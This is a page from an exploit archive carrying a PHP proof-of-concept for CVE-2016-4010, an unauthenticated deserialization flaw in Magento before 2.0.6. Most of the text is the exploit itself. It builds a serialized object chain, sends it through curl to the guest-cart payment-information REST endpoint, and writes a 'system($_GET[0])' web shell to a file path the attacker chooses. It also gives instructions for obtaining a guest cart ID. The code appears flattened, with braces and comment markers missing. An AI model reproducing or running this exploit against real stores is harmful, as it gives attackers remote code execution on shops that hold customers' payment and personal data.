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HistoryMay 18, 2016 - 12:00 a.m.

Magento Unauthenticated Arbitrary File Write


0.949 High




// Exploit Title: [CVE-2016-4010] Magento unauthenticated arbitrary unserialize -> arbitrary write file  
// Date: 18/05/206  
// Exploit Author: agix (discovered by NETANEL RUBIN)  
// Vendor Homepage:  
// Version: < 2.0.6  
// CVE : CVE-2016-4010  
// to get a valid guestCartId  
// * add an item in your cart  
// * go to checkout  
// * fill the shipping address stuff and look at the POST request to /rest/default/V1/guest-carts/<guestCartId>/shipping-information  
// (* in the response check the payment method it may vary from checkmo)  
// If you didn\'t provide whereToWrite, it will execute phpinfo to leak path.  
class Magento_Framework_Simplexml_Config_Cache_File extends DataObject  
function __construct($data){  
$this->_data = $data;  
class Credis_Client{  
const TYPE_STRING = 'string';  
const TYPE_LIST = 'list';  
const TYPE_SET = 'set';  
const TYPE_ZSET = 'zset';  
const TYPE_HASH = 'hash';  
const TYPE_NONE = 'none';  
const FREAD_BLOCK_SIZE = 8192;  
* Socket connection to the Redis server or Redis library instance  
* @var resource|Redis  
protected $redis;  
protected $redisMulti;  
* Host of the Redis server  
* @var string  
protected $host;  
* Port on which the Redis server is running  
* @var integer  
protected $port;  
* Timeout for connecting to Redis server  
* @var float  
protected $timeout;  
* Timeout for reading response from Redis server  
* @var float  
protected $readTimeout;  
* Unique identifier for persistent connections  
* @var string  
protected $persistent;  
* @var bool  
protected $closeOnDestruct = TRUE;  
* @var bool  
protected $connected = TRUE;  
* @var bool  
protected $standalone;  
* @var int  
protected $maxConnectRetries = 0;  
* @var int  
protected $connectFailures = 0;  
* @var bool  
protected $usePipeline = FALSE;  
* @var array  
protected $commandNames;  
* @var string  
protected $commands;  
* @var bool  
protected $isMulti = FALSE;  
* @var bool  
protected $isWatching = FALSE;  
* @var string  
protected $authPassword;  
* @var int  
protected $selectedDb = 0;  
* Aliases for backwards compatibility with phpredis  
* @var array  
protected $wrapperMethods = array('delete' => 'del', 'getkeys' => 'keys', 'sremove' => 'srem');  
* @var array  
protected $renamedCommands;  
* @var int  
protected $requests = 0;  
public function __construct($resource) {  
$this->redis = new Magento_Sales_Model_Order_Payment_Transaction($resource);  
class DataObject  
* Object attributes  
* @var array  
protected $_data = [];  
* Setter/Getter underscore transformation cache  
* @var array  
protected static $_underscoreCache = [];  
abstract class AbstractModel2 extends DataObject  
* Prefix of model events names  
* @var string  
protected $_eventPrefix = 'core_abstract';  
* Parameter name in event  
* In observe method you can use $observer->getEvent()->getObject() in this case  
* @var string  
protected $_eventObject = 'object';  
* Name of object id field  
* @var string  
protected $_idFieldName = 'id';  
* Data changes flag (true after setData|unsetData call)  
* @var $_hasDataChange bool  
protected $_hasDataChanges = false;  
* Original data that was loaded  
* @var array  
protected $_origData;  
* Object delete flag  
* @var bool  
protected $_isDeleted = false;  
* Resource model instance  
* @var \Magento\Framework\Model\ResourceModel\Db\AbstractDb  
protected $_resource;  
* Resource collection  
* @var \Magento\Framework\Model\ResourceModel\Db\Collection\AbstractCollection  
protected $_resourceCollection;  
* Name of the resource model  
* @var string  
protected $_resourceName;  
* Name of the resource collection model  
* @var string  
protected $_collectionName;  
* Model cache tag for clear cache in after save and after delete  
* When you use true - all cache will be clean  
* @var string|array|bool  
protected $_cacheTag = false;  
* Flag which can stop data saving after before save  
* Can be used for next sequence: we check data in _beforeSave, if data are  
* not valid - we can set this flag to false value and save process will be stopped  
* @var bool  
protected $_dataSaveAllowed = true;  
* Flag which allow detect object state: is it new object (without id) or existing one (with id)  
* @var bool  
protected $_isObjectNew = null;  
* Validator for checking the model state before saving it  
* @var \Zend_Validate_Interface|bool|null  
protected $_validatorBeforeSave = null;  
* Application Event Dispatcher  
* @var \Magento\Framework\Event\ManagerInterface  
protected $_eventManager;  
* Application Cache Manager  
* @var \Magento\Framework\App\CacheInterface  
protected $_cacheManager;  
* @var \Magento\Framework\Registry  
protected $_registry;  
* @var \Psr\Log\LoggerInterface  
protected $_logger;  
* @var \Magento\Framework\App\State  
protected $_appState;  
* @var \Magento\Framework\Model\ActionValidator\RemoveAction  
protected $_actionValidator;  
* Array to store object's original data  
* @var array  
protected $storedData = [];  
abstract class AbstractExtensibleModel extends AbstractModel2  
protected $extensionAttributesFactory;  
* @var \Magento\Framework\Api\ExtensionAttributesInterface  
protected $extensionAttributes;  
* @var AttributeValueFactory  
protected $customAttributeFactory;  
* @var string[]  
protected $customAttributesCodes = null;  
* @var bool  
protected $customAttributesChanged = false;  
abstract class AbstractModel extends AbstractExtensibleModel  
class Magento_Sales_Model_Order_Payment_Transaction extends AbstractModel  
* Supported transaction types  
* @var string  
const TYPE_PAYMENT = 'payment';  
const TYPE_ORDER = 'order';  
const TYPE_AUTH = 'authorization';  
const TYPE_CAPTURE = 'capture';  
const TYPE_VOID = 'void';  
const TYPE_REFUND = 'refund';  
* Raw details key in additional info  
const RAW_DETAILS = 'raw_details_info';  
* Order instance  
* @var \Magento\Sales\Model\Order\Payment  
protected $_order = null;  
* Parent transaction instance  
* @var \Magento\Sales\Model\Order\Payment\Transaction  
protected $_parentTransaction = null;  
* Child transactions, assoc array of transaction_id => instance  
* @var array  
protected $_children = null;  
* Child transactions, assoc array of txn_id => instance  
* Filled only in case when all child transactions have txn_id  
* Used for quicker search of child transactions using isset() as opposite to foreaching $_children  
* @var array  
protected $_identifiedChildren = null;  
* Whether to perform automatic actions on transactions, such as auto-closing and putting as a parent  
* @var bool  
protected $_transactionsAutoLinking = true;  
* Whether to throw exceptions on different operations  
* @var bool  
protected $_isFailsafe = true;  
* Whether transaction has children  
* @var bool  
protected $_hasChild = null;  
* Event object prefix  
* @var string  
* @see \Magento\Framework\Model\AbstractModel::$_eventPrefix  
protected $_eventPrefix = 'sales_order_payment_transaction';  
* Event object prefix  
* @var string  
* @see \Magento\Framework\Model\AbstractModel::$_eventObject  
protected $_eventObject = 'order_payment_transaction';  
* Order website id  
* @var int  
protected $_orderWebsiteId = null;  
* @var \Magento\Sales\Model\OrderFactory  
protected $_orderFactory;  
* @var \Magento\Framework\Stdlib\DateTime\DateTimeFactory  
protected $_dateFactory;  
* @var TransactionFactory  
protected $_transactionFactory;  
* @var \Magento\Sales\Api\OrderPaymentRepositoryInterface  
protected $orderPaymentRepository;  
* @var \Magento\Sales\Api\OrderRepositoryInterface  
protected $orderRepository;  
* @param \Magento\Framework\Model\Context $context  
* @param \Magento\Framework\Registry $registry  
* @param \Magento\Framework\Api\ExtensionAttributesFactory $extensionFactory  
* @param AttributeValueFactory $customAttributeFactory  
* @param \Magento\Sales\Model\OrderFactory $orderFactory  
* @param \Magento\Framework\Stdlib\DateTime\DateTimeFactory $dateFactory  
* @param TransactionFactory $transactionFactory  
* @param \Magento\Framework\Model\ResourceModel\AbstractResource $resource  
* @param \Magento\Framework\Data\Collection\AbstractDb $resourceCollection  
* @param array $data  
* @SuppressWarnings(PHPMD.ExcessiveParameterList)  
public function __construct($resource) {  
$this->_resource = $resource;  
class Magento_Framework_DB_Transaction{  
protected $_objects = [];  
* Transaction objects array with alias key  
* @var array  
protected $_objectsByAlias = [];  
* Callbacks array.  
* @var array  
protected $_beforeCommitCallbacks = ["phpinfo"];  
if(count($argv) < 3){  
echo 'Usage: '.$argv[0].' <magento_uri> <guestCartId> (whereToWrite)'.chr(0x0a);  
echo 'To get a valid guestCartId'.chr(0x0a);  
echo '* add an item in your cart'.chr(0x0a);  
echo '* go to checkout'.chr(0x0a);  
echo '* fill the shipping address stuff and look at the POST request to /rest/default/V1/guest-carts/<guestCartId>/shipping-information'.chr(0x0a);  
echo '(* in the response check the payment method it may vary from "checkmo")'.chr(0x0a).chr(0x0a);  
echo 'If you didn\'t provide whereToWrite, it will execute phpinfo to leak path.'.chr(0x0a);  
if(count($argv) === 4){  
$data = [];  
$data['is_allowed_to_save'] = True;  
$data['stat_file_name'] = $argv[3];  
$data['components'] = '<?php system($_GET[0]); ?>';  
$resource = new Magento_Framework_Simplexml_Config_Cache_File($data);  
$resource = new Magento_Framework_DB_Transaction();  
$redis = new Credis_Client($resource);  
$serialized = serialize($redis);  
$payload = json_decode('{"paymentMethod":{"method":"checkmo", "additional_data":{"additional_information":""}}, "email": "[email protected]"}');  
$payload->paymentMethod->additional_data->additional_information = str_replace('Magento_Framework_DB_Transaction', 'Magento\\Framework\\DB\\Transaction', str_replace('Magento_Sales_Model_Order_Payment_Transaction', 'Magento\\Sales\\Model\\Order\\Payment\\Transaction', str_replace('Magento_Framework_Simplexml_Config_Cache_File', 'Magento\\Framework\\Simplexml\\Config\\Cache\\File', $serialized)));  
for($i=0; $i<2; $i++){  
$c = curl_init($argv[1].'/rest/V1/guest-carts/'.$argv[2].'/set-payment-information');  
curl_setopt($c, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));  
curl_setopt($c, CURLOPT_POSTFIELDS, json_encode($payload));  